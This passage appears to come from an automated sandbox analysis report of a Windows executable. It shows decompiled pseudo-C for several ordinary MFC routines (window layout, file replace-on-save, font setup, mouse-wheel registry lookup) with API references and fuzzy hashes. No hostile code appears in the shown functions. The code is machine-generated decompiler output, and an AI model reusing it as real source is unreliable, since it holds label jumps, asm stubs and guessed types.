					E0041F52D(_t336,  &_v104, _a12);
					if(_a8 == _t342 || _a12 == _t342) {
						if(_v12 != _t342) {
							_v12 = _v12 + _v104.left - _v104.right;
						}
					}
					if(_a8 == _t342 || _a12 != _t342) {
						if(_v8 != _t342) {
							_v8 = _v8 + _v104.top - _v104.bottom;
						}
					}
					_t205 = _a4;
					 *_t205 = _v12;
					 *((intOrPtr*)(_t205 + 4)) = _v8;
					return _t205;
				} else {
					do {
						_t343 = E0041DD28(_t336, _v16);
						_v72 = _t343;
						_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _v16 * 4));
						if(_t343 == 0) {
							if(_t213 != 0) {
								goto L71;
							}
							L58:
							_t215 = _v40;
							if(_t215 != 0) {
								if(_a12 == 0) {
									_t312 = _v56 + _t215 -  *0x439bf0;
									_v56 = _t312;
									if(_v12 <= _t312) {
										_v12 = _t312;
									}
									if(_v8 <= _t295) {
										_v8 = _t295;
									}
									_t299 =  *0x439bf4; // 0x2
									_t295 =  ~_t299;
								} else {
									_t295 = _t295 + _t215 -  *0x439bf4;
									_t218 = _v56;
									if(_v12 <= _t218) {
										_v12 = _t218;
									}
									if(_v8 <= _t295) {
										_v8 = _t295;
									}
									_t219 =  *0x439bf0; // 0x2
									_v56 =  ~_t219;
								}
								_v40 = _v40 & 0x00000000;
							}
							goto L71;
						}
						if( *((intOrPtr*)( *_t343 + 0xc8))() == 0) {
							L51:
							if(_v36 != 0) {
								goto L71;
							}
							L52:
							 *((intOrPtr*)( *_t343 + 0xcc))( &_v136);
							goto L71;
						}
						_t225 =  *(_t343 + 0x64);
						if((_t225 & 0x00000004) == 0 || (_t225 & 0x00000001) == 0) {
							asm("sbb eax, eax");
							_t229 = ( ~(_t225 & 0x0000a000) & 0x000000fa) + 0x10;
						} else {
							_t229 = 6;
						}
						_t231 =  *((intOrPtr*)( *_t343 + 0xbc))( &_v144, 0xffffffff, _t229);
						_t327 = _v56;
						_v64 =  *_t231;
						_v60 =  *((intOrPtr*)(_t231 + 4));
						_v32.left = _t327;
						_v32.bottom =  *((intOrPtr*)(_t231 + 4)) + _t295;
						_v32.right =  *_t231 + _t327;
						_v32.top = _t295;
						GetWindowRect( *(_t343 + 0x1c),  &_v88);
						E0041A2F1(_t336,  &_v88);
						_t322 = 0;
						if(_a12 == 0) {
							_t238 = _v88.top;
							if(_t238 > _v32.top &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
								OffsetRect( &_v32, 0, _t238 - _v32.top);
								_t322 = 0;
							}
							_t239 = _v32.bottom;
							if(_t239 > _v44 &&  *((intOrPtr*)(_t336 + 0x78)) == _t322) {
								_t333 = _v44 - _t239 - _v32.top -  *0x439bf4;
								_t256 = _t333;
								if(_t333 <= _t295) {
									_t256 = _t295;
								}
								OffsetRect( &_v32, _t322, _t256 - _v32.top);
								_t322 = 0;
							}
							if(_v36 == _t322) {
								if(_v32.top < _v44 -  *0x439bf4) {
									goto L44;
								}
								_t249 = _v16;
								if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
									goto L44;
								} else {
									goto L56;
								}
							} else {
								_t251 =  *0x439bf4; // 0x2
								_v36 = _t322;
								OffsetRect( &_v32, _t322,  ~(_v32.top + _t251));
								L44:
								_t244 = EqualRect( &_v32,  &_v88);
								if(_t244 == 0) {
									if( *((intOrPtr*)(_t336 + 0x90)) == _t244 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t343 = _v72;
										_t336 = _v68;
									}
									E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
								}
								_t245 = _v64;
								_t295 = _v32.top -  *0x439bf4 + _v60;
								if(_v40 > _t245) {
									goto L52;
								} else {
									_v40 = _t245;
									goto L51;
								}
							}
						} else {
							_t263 = _v88.left;
							if(_t263 > _v32.left &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
								OffsetRect( &_v32, _t263 - _v32.left, 0);
								_t322 = 0;
							}
							_t264 = _v32.right;
							if(_t264 <= _v48 ||  *((intOrPtr*)(_t336 + 0x78)) != _t322) {
								L22:
								if(_v36 == _t322) {
									if(_v32.left < _v48 -  *0x439bf0) {
										L27:
										_t269 = EqualRect( &_v32,  &_v88);
										if(_t269 == 0) {
											if( *((intOrPtr*)(_t336 + 0x90)) == _t269 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t343 = _v72;
												_t336 = _v68;
											}
											E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
										}
										_v56 = _v64 -  *0x439bf0 + _v32.left;
										_t273 = _v60;
										if(_v40 <= _t273) {
											_v40 = _t273;
										}
										goto L52;
									}
									_t249 = _v16;
									if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
										goto L27;
									} else {
										L56:
										_t345 = 1;
										E004115B1(_t336 + 0x7c, _t249, _t322, _t345);
										_v36 = _t345;
										goto L58;
									}
								}
								_t277 =  *0x439bf0; // 0x2
								_v36 = _t322;
								OffsetRect( &_v32,  ~(_t277 + _v32.left), _t322);
								goto L27;
							} else {
								_t285 = _v48 - _t264 -  *0x439bf0 - _v32.left;
								if(_t285 <= _v56) {
									_t285 = _v56;
								}
								OffsetRect( &_v32, _t285 - _v32.left, _t322);
								_t322 = 0;
								goto L22;
							}
						}
						L71:
						_v16 = _v16 + 1;
					} while (_v16 <  *(_t336 + 0x84));
					_t342 = 0;
					goto L73;
				}
			}

0x0041d717
0x0041d728
0x0041d72d
0x0041d731
0x0041d738
0x0041d73f
0x0041d745
0x0041d750
0x0041d76d
0x0041d779
0x0041d77c
0x0041d752
0x0041d758
0x0041d75a
0x0041d75a
0x0041d77f
0x0041d781
0x0041d78a
0x0041d78d
0x0041d7a3
0x0041d78f
0x0041d78f
0x0041d78f
0x0041d7a9
0x0041d7ae
0x0041d7af
0x0041d7b5
0x0041d7ba
0x0041d7c2
0x0041d7c5
0x0041d7c8
0x0041d7cb
0x0041db31
0x0041db38
0x0041db48
0x0041db48
0x0041db52
0x0041db61
0x0041db69
0x0041db73
0x0041db7b
0x0041db7b
0x0041db73
0x0041db81
0x0041db8b
0x0041db93
0x0041db93
0x0041db8b
0x0041db96
0x0041db9e
0x0041dba3
0x0041dba7
0x0041d7d1
0x0041d7d1
0x0041d7de
0x0041d7e6
0x0041d7eb
0x0041d7ee
0x0041dabd
0x00000000
0x00000000
0x0041dabf
0x0041dabf
0x0041dac4
0x0041daca
0x0041dafc
0x0041db01
0x0041db04
0x0041db06
0x0041db06
0x0041db0c
0x0041db0e
0x0041db0e
0x0041db11
0x0041db17
0x0041dacc
0x0041dad2
0x0041dad4
0x0041dada
0x0041dadc
0x0041dadc
0x0041dae2
0x0041dae4
0x0041dae4
0x0041dae7
0x0041daee
0x0041daee
0x0041db19
0x0041db19
0x00000000
0x0041dac4
0x0041d800
0x0041da5b
0x0041da5f
0x00000000
0x00000000
0x0041da65
0x0041da70
0x00000000
0x0041da70
0x0041d806
0x0041d80b
0x0041d81d
0x0041d821
0x0041d811
0x0041d813
0x0041d813
0x0041d832
0x0041d83a
0x0041d83d
0x0041d843
0x0041d84f
0x0041d852
0x0041d859
0x0041d85f
0x0041d862
0x0041d86e
0x0041d873
0x0041d878
0x0041d985
0x0041d98b
0x0041d99b
0x0041d9a1
0x0041d9a1
0x0041d9a3
0x0041d9a9
0x0041d9bc
0x0041d9c0
0x0041d9c2
0x0041d9c4
0x0041d9c4
0x0041d9cf
0x0041d9d5
0x0041d9d5
0x0041d9da
0x0041da87
0x00000000
0x00000000
0x0041da8d
0x0041da92
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d9e0
0x0041d9e0
0x0041d9f2
0x0041d9f5
0x0041d9fb
0x0041da03
0x0041da0b
0x0041da13
0x0041da27
0x0041da28
0x0041da29
0x0041da2a
0x0041da2b
0x0041da2e
0x0041da2e
0x0041da3f
0x0041da3f
0x0041da47
0x0041da50
0x0041da56
0x00000000
0x0041da58
0x0041da58
0x00000000
0x0041da58
0x0041da56
0x0041d87e
0x0041d87e
0x0041d884
0x0041d894
0x0041d89a
0x0041d89a
0x0041d89c
0x0041d8a2
0x0041d8d2
0x0041d8d5
0x0041d900
0x0041d919
0x0041d921
0x0041d929
0x0041d931
0x0041d945
0x0041d946
0x0041d947
0x0041d948
0x0041d949
0x0041d94c
0x0041d94c
0x0041d95d
0x0041d95d
0x0041d96e
0x0041d971
0x0041d977
0x0041d97d
0x0041d97d
0x00000000
0x0041d977
0x0041d902
0x0041d907
0x00000000
0x0041daa8
0x0041daa8
0x0041daaa
0x0041dab1
0x0041dab6
0x00000000
0x0041dab6
0x0041d907
0x0041d8d7
0x0041d8dc
0x0041d8ec
0x00000000
0x0041d8a9
0x0041d8b7
0x0041d8bc
0x0041d8be
0x0041d8be
0x0041d8ca
0x0041d8d0
0x00000000
0x0041d8d0
0x0041d8a2
0x0041db1d
0x0041db1d
0x0041db23
0x0041db2f
0x00000000
0x0041db2f

APIs

IsRectEmpty.USER32(?), ref: 0041D748
GetClientRect.USER32 ref: 0041D76D
BeginDeferWindowPos.USER32 ref: 0041D79D
GetWindowRect.USER32 ref: 0041D862
OffsetRect.USER32(?,?,00000000), ref: 0041D894
OffsetRect.USER32(?,?,00000000), ref: 0041D8CA
OffsetRect.USER32(?,00000002,00000000), ref: 0041D8EC
EqualRect.USER32 ref: 0041D921
OffsetRect.USER32(?,00000000,?), ref: 0041D99B
OffsetRect.USER32(?,00000000,?), ref: 0041D9CF
OffsetRect.USER32(?,00000000,?), ref: 0041D9F5
EqualRect.USER32 ref: 0041DA03
EndDeferWindowPos.USER32(?), ref: 0041DB48
SetRectEmpty.USER32(?), ref: 0041DB52

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
String ID:
API String ID: 3160784657-0
Opcode ID: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
Instruction ID: 4bc4fb7537ac9ebda1473157cc7a63845d4aad135b3ed423640b2285e9e568f1
Opcode Fuzzy Hash: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
Instruction Fuzzy Hash: 19F1F9B1E0021ADFCF14DFA8D984AEEB7B5FF08305F14816AE516E7251D738A981CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00418E48, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 168
stringlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00418E48(intOrPtr __ecx) {
				void* __edi;
				void* __esi;
				void* _t60;
				CHAR* _t61;
				_Unknown_base(*)()* _t67;
				void* _t70;
				CHAR* _t73;
				short* _t79;
				CHAR* _t82;
				short* _t88;
				CHAR* _t91;
				void* _t112;
				long _t114;
				short* _t116;
				intOrPtr _t118;
				int _t122;
				int _t124;
				int _t126;
				void* _t127;
				void* _t129;
				void* _t130;
				short* _t133;
				intOrPtr _t135;

				E00406520(E00429FEC, _t127);
				_t130 = _t129 - 0x20;
				_t118 = __ecx;
				_push(_t112);
				 *((intOrPtr*)(_t127 - 0x1c)) = __ecx;
				E00416861(_t127 - 0x18, __ecx + 0xc);
				 *(_t127 - 4) = 0;
				E004179D8(_t118, _t112, _t118);
				if( *((intOrPtr*)( *(_t118 + 0x10) - 8)) != 0) {
					_t61 =  *0x436980; // 0x436994
					_t114 = 0;
					 *(_t127 - 0x14) = _t61;
					_t135 =  *0x439c38; // 0x0
					 *(_t127 - 4) = 1;
					if(_t135 != 0) {
						L15:
						E00417B0B( *(_t127 - 0x18));
						goto L16;
					} else {
						_t67 = GetProcAddress(GetModuleHandleA("KERNEL32"), "ReplaceFile");
						_t136 = _t67;
						 *(_t127 - 0x2c) = _t67;
						if(_t67 == 0) {
							goto L15;
						} else {
							_push(0);
							_push( *(_t118 + 0x10));
							_push(_t127 - 0x28);
							_t70 = E00418BE2(_t136);
							_t133 = _t130 + 0xc;
							 *(_t127 - 4) = 2;
							E00416B95(_t127 - 0x14, _t127, _t70);
							_t111 = _t127 - 0x28;
							 *(_t127 - 4) = 1;
							E00416AEC(_t127 - 0x28);
							_t73 =  *(_t127 - 0x14);
							 *(_t127 - 0x10) = _t73;
							if(_t73 != 0) {
								_t122 = lstrlenA(_t73) + 1;
								__eflags = _t122 + _t122 + 0x00000003 & 0x000000fc;
								E00406830(_t122 + _t122 + 0x00000003 & 0x000000fc, _t111);
								_t79 = _t133;
								 *(_t127 - 0x24) = _t79;
								 *_t79 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t79, _t122);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
								 *(_t127 - 0x20) =  *(_t127 - 0x24);
							} else {
								 *(_t127 - 0x20) = 0;
							}
							_t82 =  *(_t118 + 0x10);
							 *(_t127 - 0x10) = _t82;
							if(_t82 != 0) {
								_t124 = lstrlenA(_t82) + 1;
								__eflags = _t124 + _t124 + 0x00000003 & 0x000000fc;
								E00406830(_t124 + _t124 + 0x00000003 & 0x000000fc, _t111);
								_t88 = _t133;
								 *(_t127 - 0x24) = _t88;
								 *_t88 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t88, _t124);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
							} else {
								 *(_t127 - 0x24) = 0;
							}
							_t91 =  *(_t127 - 0x18);
							 *(_t127 - 0x10) = _t91;
							if(_t91 != 0) {
								_t126 = lstrlenA(_t91) + 1;
								__eflags = _t126 + _t126 + 0x00000003 & 0x000000fc;
								E00406830(_t126 + _t126 + 0x00000003 & 0x000000fc, _t111);
								_t116 = _t133;
								 *_t116 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t116, _t126);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
							} else {
								_t116 = 0;
							}
							_push(0);
							_push(0);
							_push(3);
							_push( *(_t127 - 0x20));
							_push( *(_t127 - 0x24));
							_push(_t116);
							if( *(_t127 - 0x2c)() != 0) {
								E00417B0B( *(_t127 - 0x14));
							} else {
								_t114 = GetLastError();
								if(_t114 == 0x498 || _t114 == 0) {
									goto L15;
								}
								L16:
								if(_t114 == 0x499) {
									E00417B0B( *(_t127 - 0x14));
								}
								E00417AE9( *(_t118 + 0x10),  *(_t127 - 0x18));
							}
						}
					}
					 *(_t127 - 4) = 0;
					E00416AEC(_t127 - 0x14);
				}
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				_t60 = E00416AEC(_t127 - 0x18);
				 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0xc));
				return _t60;
			}

0x00418e4d
0x00418e52
0x00418e57
0x00418e59
0x00418e5d
0x00418e64
0x00418e6d
0x00418e70
0x00418e7b
0x00418e81
0x00418e86
0x00418e88
0x00418e8b
0x00418e91
0x00418e95
0x00418fcf
0x00418fd2
0x00000000
0x00418e9b
0x00418eac
0x00418eb2
0x00418eb4
0x00418eb7
0x00000000
0x00418ebd
0x00418ec0
0x00418ec1
0x00418ec5
0x00418ec6
0x00418ecb
0x00418ed2
0x00418ed6
0x00418edb
0x00418ede
0x00418ee2
0x00418ee7
0x00418ef2
0x00418ef5
0x00418f01
0x00418f08
0x00418f0a
0x00418f0f
0x00418f18
0x00418f1b
0x00418f20
0x00418f29
0x00418f2c
0x00418ef7
0x00418ef7
0x00418ef7
0x00418f2f
0x00418f34
0x00418f37
0x00418f43
0x00418f4a
0x00418f4c
0x00418f51
0x00418f5a
0x00418f5d
0x00418f62
0x00418f6b
0x00418f39
0x00418f39
0x00418f39
0x00418f71
0x00418f76
0x00418f79
0x00418f84
0x00418f8b
0x00418f8d
0x00418f92
0x00418f9b
0x00418fa0
0x00418fa6
0x00418f7b
0x00418f7b
0x00418f7b
0x00418fa9
0x00418faa
0x00418fab
0x00418fad
0x00418fb0
0x00418fb3
0x00418fb9
0x00418ff8
0x00418fbb
0x00418fc1
0x00418fc9
0x00000000
0x00000000
0x00418fd7
0x00418fdd
0x00418fe2
0x00418fe2
0x00418fee
0x00418fee
0x00418fb9
0x00418eb7
0x00419000
0x00419003
0x00419003
0x00419008
0x0041900f
0x0041901a
0x00419025

APIs

__EH_prolog.LIBCMT ref: 00418E4D

Part of subcall function 00416861: InterlockedIncrement.KERNEL32(?), ref: 00416876

Part of subcall function 004179D8: CloseHandle.KERNEL32(00000001,?,?,0041772F,?,?,004176CD), ref: 004179E7
Part of subcall function 004179D8: GetLastError.KERNEL32(00000000,0041772F,?,?,004176CD), ref: 00417A0C

GetModuleHandleA.KERNEL32(KERNEL32,?), ref: 00418EA0
GetProcAddress.KERNEL32(00000000,ReplaceFile), ref: 00418EAC

Part of subcall function 00418BE2: __EH_prolog.LIBCMT ref: 00418BE7
Part of subcall function 00418BE2: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
Part of subcall function 00418BE2: GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40

Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00

lstrlenA.KERNEL32(?), ref: 00418EFD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00418F20
lstrlenA.KERNEL32(?,?,00000001), ref: 00418F3F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001), ref: 00418F62
lstrlenA.KERNEL32(?,?,00000001,?,00000001), ref: 00418F80
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001,?,00000001), ref: 00418FA0
GetLastError.KERNEL32(?,?,?,00000003,00000000,00000000,?,00000001,?,00000001,?,00000001), ref: 00418FBB

Strings

ReplaceFile, xrefs: 00418EA6
KERNEL32, xrefs: 00418E9B

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$ErrorH_prologHandleInterlockedLastName$AddressCloseDecrementFileFullIncrementModulePathProcTemp
String ID: KERNEL32$ReplaceFile
API String ID: 3306742873-430465611
Opcode ID: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
Instruction ID: 35d1a50c5f76602bfe157e4308a6fe3e42fd926e881e06ee79976fcc1b195d94
Opcode Fuzzy Hash: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
Instruction Fuzzy Hash: 4B516FB2D00219AFCB10EFA5CC858EFBBB9EF08354B51056EE411B3250DB389E45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00422A19, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 111
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00422A19(void* __edi, void* __esi) {
				void* _t28;
				void* _t31;
				void* _t42;
				struct HFONT__* _t50;
				void* _t53;
				void* _t64;
				void* _t65;
				void* _t67;
				void* _t70;
				intOrPtr _t76;
				void* _t77;
				void* _t79;
				void* _t86;

				_t67 = __esi;
				_t64 = __edi;
				_t28 = E00406520(E0042A954, _t70);
				_t76 =  *0x439c44; // 0x1
				if(_t76 != 0) {
					L21:
					 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
					return _t28;
				}
				E00425F56(0xa);
				_t77 =  *0x439ca4; // 0x0
				if(_t77 == 0) {
					_t53 = LoadBitmapA( *(E00424BFB() + 0xc), 0x7912);
					 *0x439ca4 = _t53;
					if(GetObjectA(_t53, 0x18, _t70 - 0x78) != 0) {
						 *0x439c98 =  *((intOrPtr*)(_t70 - 0x74));
						 *0x439c9c =  *((intOrPtr*)(_t70 - 0x70));
					}
				}
				_t79 =  *0x439ca0; // 0x0
				if(_t79 != 0) {
					L11:
					_push(_t67);
					_push(_t64);
					_push(0);
					E0041A369(_t70 - 0x24, _t82);
					_t31 =  *0x439ca0; // 0x0
					 *(_t70 - 4) = 0;
					if(_t31 == 0) {
						_t65 = 0;
						__eflags = 0;
					} else {
						_t65 = SelectObject( *(_t70 - 0x20), _t31);
					}
					 *((intOrPtr*)(_t70 - 0x10)) = GetTextMetricsA( *(_t70 - 0x1c), _t70 - 0xb0);
					if(_t65 != 0) {
						SelectObject( *(_t70 - 0x20), _t65);
					}
					if( *((intOrPtr*)(_t70 - 0x10)) == 0) {
						L18:
						E0041A89B(0x439ca0);
						goto L19;
					} else {
						_t86 =  *(_t70 - 0xb0) -  *((intOrPtr*)(_t70 - 0xa4)) -  *0x439c9c; // 0x0
						if(_t86 <= 0) {
							L19:
							 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
							E0041A3DB(_t70 - 0x24);
							goto L20;
						}
						goto L18;
					}
				} else {
					E00406330(_t70 - 0x60, 0, 0x3c);
					 *((char*)(_t70 - 0x49)) = 1;
					 *((intOrPtr*)(_t70 - 0x50)) = 0x190;
					_t42 = 1;
					 *(_t70 - 0x60) = _t42 -  *0x439c9c;
					if(GetSystemMetrics(0x2a) == 0) {
						_push("Small Fonts");
					} else {
						_push("Terminal");
					}
					lstrcpyA(_t70 - 0x44, ??);
					if(E0041A6E1(0xf233, _t70 - 0x60) == 0) {
						 *((char*)(_t70 - 0x45)) = 0x20;
					}
					_t50 = CreateFontIndirectA(_t70 - 0x60);
					_t82 = _t50;
					 *0x439ca0 = _t50;
					if(_t50 == 0) {
						L20:
						_t28 = E00425FC6(0xa);
						goto L21;
					} else {
						goto L11;
					}
				}
			}

0x00422a19
0x00422a19
0x00422a1e
0x00422a2c
0x00422a32
0x00422b78
0x00422b7c
0x00422b84
0x00422b84
0x00422a3a
0x00422a3f
0x00422a45
0x00422a55
0x00422a5e
0x00422a6f
0x00422a74
0x00422a7c
0x00422a7c
0x00422a6f
0x00422a81
0x00422a87
0x00422afa
0x00422afa
0x00422afb
0x00422afc
0x00422b00
0x00422b05
0x00422b12
0x00422b15
0x00422b21
0x00422b21
0x00422b17
0x00422b1d
0x00422b1d
0x00422b35
0x00422b38
0x00422b3e
0x00422b3e
0x00422b45
0x00422b5b
0x00422b60
0x00000000
0x00422b47
0x00422b53
0x00422b59
0x00422b65
0x00422b65
0x00422b6c
0x00000000
0x00422b6c
0x00000000
0x00422b59
0x00422a89
0x00422a90
0x00422a98
0x00422a9c
0x00422aa5
0x00422aae
0x00422ab9
0x00422ac2
0x00422abb
0x00422abb
0x00422abb
0x00422acb
0x00422ae1
0x00422ae3
0x00422ae3
0x00422aeb
0x00422af1
0x00422af3
0x00422af8
0x00422b71
0x00422b73
0x00000000
0x00000000
0x00000000
0x00000000
0x00422af8

APIs

__EH_prolog.LIBCMT ref: 00422A1E

Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
Part of subcall function 00425F56: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
Part of subcall function 00425F56: LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE

LoadBitmapA.USER32 ref: 00422A55
GetObjectA.GDI32(00000000,00000018,?), ref: 00422A67
GetSystemMetrics.USER32 ref: 00422AB1
lstrcpyA.KERNEL32(?,Small Fonts,?,0000000A), ref: 00422ACB
CreateFontIndirectA.GDI32(?), ref: 00422AEB
SelectObject.GDI32(?,00000000), ref: 00422B1B
GetTextMetricsA.GDI32(?,?), ref: 00422B2D
SelectObject.GDI32(?,00000000), ref: 00422B3E

Strings

Small Fonts, xrefs: 00422AC2
, xrefs: 00422AE3
Terminal, xrefs: 00422ABB

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalSection$Object$EnterMetricsSelect$BitmapCreateFontH_prologIndirectInitializeLeaveLoadSystemTextlstrcpy
String ID: $Small Fonts$Terminal
API String ID: 1234877182-3042510724
Opcode ID: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
Instruction ID: af1173b3a4b80694a70ec61d8b55af463f2ab6573842c533f6f97c7bdcca2de6
Opcode Fuzzy Hash: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
Instruction Fuzzy Hash: 72417171B00219AFDB20DFA5ED85AAE7BB5FB04344F94013AE505E6191DBB85D01CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABA7, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 80
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041ABA7() {
				void* _v8;
				int _v12;
				int _v16;
				char _v144;
				void _t9;
				struct HWND__* _t20;
				void _t21;
				int _t22;
				int _t23;
				int _t27;
				short _t28;
				intOrPtr _t30;

				_t27 =  *0x437cdc; // 0x0
				if(_t27 != 0) {
					L16:
					_t9 =  *0x439c90; // 0x0
					return _t9;
				}
				_t28 =  *0x439c8c; // 0x0
				 *0x437cdc = 1;
				if(_t28 != 0) {
					L10:
					__eflags =  *0x439c8c - 2;
					if( *0x439c8c != 2) {
						L4:
						_t30 =  *0x439c3c; // 0x1
						 *0x439c90 = 3;
						if(_t30 != 0) {
							__eflags =  *0x439c38; // 0x0
							if(__eflags == 0) {
								SystemParametersInfoA(0x68, 0, 0x439c90, 0);
							}
						} else {
							if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop", 0, 1,  &_v8) == 0) {
								_v12 = 0x80;
								if(RegQueryValueExA(_v8, "WheelScrollLines", 0,  &_v16,  &_v144,  &_v12) == 0) {
									 *0x439c90 = E0040718F( &_v144, 0, 0xa);
								}
								RegCloseKey(_v8);
							}
						}
						goto L16;
					}
					_t20 = FindWindowA("MouseZ", "Magellan MSWHEEL");
					__eflags = _t20;
					if(_t20 == 0) {
						goto L4;
					}
					_t23 =  *0x439c88; // 0x0
					__eflags = _t23;
					if(_t23 == 0) {
						goto L4;
					}
					_t21 = SendMessageA(_t20, _t23, 0, 0);
					 *0x439c90 = _t21;
					return _t21;
				}
				_t22 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
				 *0x439c88 = _t22;
				if(_t22 != 0) {
					 *0x439c8c = 2;
					goto L10;
				} else {
					 *0x439c8c = 1;
					goto L4;
				}
			}

0x0041abb3
0x0041abb9
0x0041acdc
0x0041acdc
0x00000000
0x0041acdc
0x0041abbf
0x0041abc6
0x0041abd0
0x0041ac80
0x0041ac80
0x0041ac88
0x0041abf7
0x0041abf7
0x0041abfd
0x0041ac07
0x0041acc5
0x0041accb
0x0041acd6
0x0041acd6
0x0041ac0d
0x0041ac26
0x0041ac2f
0x0041ac53
0x0041ac67
0x0041ac67
0x0041ac6f
0x0041ac6f
0x0041ac26
0x00000000
0x0041ac07
0x0041ac98
0x0041ac9e
0x0041aca0
0x00000000
0x00000000
0x0041aca6
0x0041acac
0x0041acae
0x00000000
0x00000000
0x0041acb8
0x0041acbe
0x00000000
0x0041acbe
0x0041abdb
0x0041abe3
0x0041abe8
0x0041ac77
0x00000000
0x0041abee
0x0041abee
0x00000000
0x0041abee

APIs

RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG), ref: 0041ABDB
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop,00000000,00000001,?), ref: 0041AC1E
RegQueryValueExA.ADVAPI32(?,WheelScrollLines,00000000,?,?,?), ref: 0041AC4B
RegCloseKey.ADVAPI32(?), ref: 0041AC6F
FindWindowA.USER32 ref: 0041AC98
SendMessageA.USER32 ref: 0041ACB8
